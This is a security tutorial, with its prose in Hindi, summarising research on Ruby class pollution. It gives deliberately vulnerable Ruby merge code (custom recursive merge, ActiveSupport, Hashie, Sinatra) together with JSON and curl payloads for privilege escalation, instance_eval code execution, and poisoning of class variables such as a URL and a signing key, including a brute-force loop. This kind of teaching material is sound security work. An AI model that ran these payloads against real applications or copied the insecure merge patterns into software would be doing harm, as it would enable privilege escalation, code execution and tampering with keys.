Ruby Class Pollution

Reading time: 9 minutes

यह https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html से एक सारांश है

Merge on Attributes

Example:

# Code from https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html
# Comments added to exploit the merge on attributes
require 'json'


# Base class for both Admin and Regular users
class Person

attr_accessor :name, :age, :details

def initialize(name:, age:, details:)
@name = name
@age = age
@details = details
end

# Method to merge additional data into the object
def merge_with(additional)
recursive_merge(self, additional)
end

# Authorize based on the `to_s` method result
def authorize
if to_s == "Admin"
puts "Access granted: #{@name} is an admin."
else
puts "Access denied: #{@name} is not an admin."
end
end

# Health check that executes all protected methods using `instance_eval`
def health_check
protected_methods().each do |method|
instance_eval(method.to_s)
end
end

private

# VULNERABLE FUNCTION that can be abused to merge attributes
def recursive_merge(original, additional, current_obj = original)
additional.each do |key, value|

if value.is_a?(Hash)
if current_obj.respond_to?(key)
next_obj = current_obj.public_send(key)
recursive_merge(original, value, next_obj)
else
new_object = Object.new
current_obj.instance_variable_set("@#{key}", new_object)
current_obj.singleton_class.attr_accessor key
end
else
current_obj.instance_variable_set("@#{key}", value)
current_obj.singleton_class.attr_accessor key
end
end
original
end

protected

def check_cpu
puts "CPU check passed."
end

def check_memory
puts "Memory check passed."
end
end

# Admin class inherits from Person
class Admin < Person
def initialize(name:, age:, details:)
super(name: name, age: age, details: details)
end

def to_s
"Admin"
end
end

# Regular user class inherits from Person
class User < Person
def initialize(name:, age:, details:)
super(name: name, age: age, details: details)
end

def to_s
"User"
end
end

class JSONMergerApp
def self.run(json_input)
additional_object = JSON.parse(json_input)

# Instantiate a regular user
user = User.new(
name: "John Doe",
age: 30,
details: {
"occupation" => "Engineer",
"location" => {
"city" => "Madrid",
"country" => "Spain"
}
}
)


# Perform a recursive merge, which could override methods
user.merge_with(additional_object)

# Authorize the user (privilege escalation vulnerability)
# ruby class_pollution.rb '{"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
user.authorize

# Execute health check (RCE vulnerability)
# ruby class_pollution.rb '{"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
user.health_check

end
end

if ARGV.length != 1
puts "Usage: ruby class_pollution.rb 'JSON_STRING'"
exit
end

json_input = ARGV[0]
JSONMergerApp.run(json_input)

Explanation

1. Privilege Escalation: authorize विधि जांचती है कि क्या to_s "Admin" लौटाता है। JSON के माध्यम से एक नया to_s गुण इंजेक्ट करके, एक हमलावर to_s विधि को "Admin" लौटाने के लिए मजबूर कर सकता है, जिससे अनधिकृत विशेषाधिकार मिलते हैं।
2. Remote Code Execution: health_check में, instance_eval उन विधियों को निष्पादित करता है जो protected_methods में सूचीबद्ध हैं। यदि एक हमलावर कस्टम विधि नाम (जैसे "puts 1") इंजेक्ट करता है, तो instance_eval इसे निष्पादित करेगा, जिससे remote code execution (RCE) होगा।
3. यह केवल इसलिए संभव है क्योंकि एक vulnerable eval निर्देश उस गुण के स्ट्रिंग मान को निष्पादित कर रहा है।
4. Impact Limitation: यह भेद्यता केवल व्यक्तिगत उदाहरणों को प्रभावित करती है, अन्य User और Admin के उदाहरणों को अप्रभावित छोड़ देती है, इस प्रकार शोषण के दायरे को सीमित करती है।

Real-World Cases

ActiveSupport’s deep_merge

यह डिफ़ॉल्ट रूप से कमजोर नहीं है लेकिन इसे कुछ इस तरह से कमजोर बनाया जा सकता है:

# Method to merge additional data into the object using ActiveSupport deep_merge
def merge_with(other_object)
merged_hash = to_h.deep_merge(other_object)

merged_hash.each do |key, value|
self.class.attr_accessor key
instance_variable_set("@#{key}", value)
end

self
end

Hashie का deep_merge

Hashie का deep_merge मेथड सीधे ऑब्जेक्ट के एट्रिब्यूट्स पर काम करता है न कि साधारण हैश पर। यह मेथड्स को एट्रिब्यूट्स के साथ मर्ज में बदलने से रोकता है कुछ अपवादों के साथ: एट्रिब्यूट्स जो _, !, या ? पर समाप्त होते हैं, उन्हें अभी भी ऑब्जेक्ट में मर्ज किया जा सकता है।

एक विशेष मामला है एट्रिब्यूट _ जो अकेला है। केवल _ एक एट्रिब्यूट है जो आमतौर पर एक Mash ऑब्जेक्ट लौटाता है। और क्योंकि यह अपवादों का हिस्सा है, इसे संशोधित करना संभव है।

नीचे दिए गए उदाहरण को देखें कि कैसे {"_": "Admin"} पास करने पर _.to_s == "Admin" को बायपास किया जा सकता है:

require 'json'
require 'hashie'

# Base class for both Admin and Regular users
class Person < Hashie::Mash

# Method to merge additional data into the object using hashie
def merge_with(other_object)
deep_merge!(other_object)
self
end

# Authorize based on to_s
def authorize
if _.to_s == "Admin"
puts "Access granted: #{@name} is an admin."
else
puts "Access denied: #{@name} is not an admin."
end
end

end

# Admin class inherits from Person
class Admin < Person
def to_s
"Admin"
end
end

# Regular user class inherits from Person
class User < Person
def to_s
"User"
end
end

class JSONMergerApp
def self.run(json_input)
additional_object = JSON.parse(json_input)

# Instantiate a regular user
user = User.new({
name: "John Doe",
age: 30,
details: {
"occupation" => "Engineer",
"location" => {
"city" => "Madrid",
"country" => "Spain"
}
}
})

# Perform a deep merge, which could override methods
user.merge_with(additional_object)

# Authorize the user (privilege escalation vulnerability)
# Exploit: If we pass {"_": "Admin"} in the JSON, the user will be treated as an admin.
# Example usage: ruby hashie.rb '{"_": "Admin", "name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
user.authorize
end
end

if ARGV.length != 1
puts "Usage: ruby hashie.rb 'JSON_STRING'"
exit
end

json_input = ARGV[0]
JSONMergerApp.run(json_input)

Poison the Classes

निम्नलिखित उदाहरण में Person क्लास, और Admin और Regular क्लासों को ढूंढना संभव है जो Person क्लास से विरासत में मिली हैं। इसमें एक और क्लास है जिसे KeySigner कहा जाता है:

require 'json'
require 'sinatra/base'
require 'net/http'

# Base class for both Admin and Regular users
class Person
@@url = "http://default-url.com"

attr_accessor :name, :age, :details

def initialize(name:, age:, details:)
@name = name
@age = age
@details = details
end

def self.url
@@url
end

# Method to merge additional data into the object
def merge_with(additional)
recursive_merge(self, additional)
end

private

# Recursive merge to modify instance variables
def recursive_merge(original, additional, current_obj = original)
additional.each do |key, value|
if value.is_a?(Hash)
if current_obj.respond_to?(key)
next_obj = current_obj.public_send(key)
recursive_merge(original, value, next_obj)
else
new_object = Object.new
current_obj.instance_variable_set("@#{key}", new_object)
current_obj.singleton_class.attr_accessor key
end
else
current_obj.instance_variable_set("@#{key}", value)
current_obj.singleton_class.attr_accessor key
end
end
original
end
end

class User < Person
def initialize(name:, age:, details:)
super(name: name, age: age, details: details)
end
end

# A class created to simulate signing with a key, to be infected with the third gadget
class KeySigner
@@signing_key = "default-signing-key"

def self.signing_key
@@signing_key
end

def sign(signing_key, data)
"#{data}-signed-with-#{signing_key}"
end
end

class JSONMergerApp < Sinatra::Base
# POST /merge - Infects class variables using JSON input
post '/merge' do
content_type :json
json_input = JSON.parse(request.body.read)

user = User.new(
name: "John Doe",
age: 30,
details: {
"occupation" => "Engineer",
"location" => {
"city" => "Madrid",
"country" => "Spain"
}
}
)

user.merge_with(json_input)

{ status: 'merged' }.to_json
end

# GET /launch-curl-command - Activates the first gadget
get '/launch-curl-command' do
content_type :json

# This gadget makes an HTTP request to the URL stored in the User class
if Person.respond_to?(:url)
url = Person.url
response = Net::HTTP.get_response(URI(url))
{ status: 'HTTP request made', url: url, response_body: response.body }.to_json
else
{ status: 'Failed to access URL variable' }.to_json
end
end

# Curl command to infect User class URL:
# curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://example.com"}}}' http://localhost:4567/merge

# GET /sign_with_subclass_key - Signs data using the signing key stored in KeySigner
get '/sign_with_subclass_key' do
content_type :json

# This gadget signs data using the signing key stored in KeySigner class
signer = KeySigner.new
signed_data = signer.sign(KeySigner.signing_key, "data-to-sign")

{ status: 'Data signed', signing_key: KeySigner.signing_key, signed_data: signed_data }.to_json
end

# Curl command to infect KeySigner signing key (run in a loop until successful):
# for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge; done

# GET /check-infected-vars - Check if all variables have been infected
get '/check-infected-vars' do
content_type :json

{
user_url: Person.url,
signing_key: KeySigner.signing_key
}.to_json
end

run! if app_file == $0
end

Poison Parent Class

इस पेलोड के साथ:

curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://malicious.com"}}}' http://localhost:4567/merge

यह संभव है कि माता-पिता की कक्षा Person के @@url गुण के मान को संशोधित किया जा सके।

अन्य कक्षाओं को ज़हर देना

इस पेलोड के साथ:

for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge --silent > /dev/null; done

यह संभव है कि परिभाषित कक्षाओं को ब्रूट-फोर्स किया जाए और किसी बिंदु पर कक्षा KeySigner को ज़हर दिया जाए, signing_key के मान को injected-signing-key द्वारा संशोधित किया जाए।\

संदर्भ

• https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html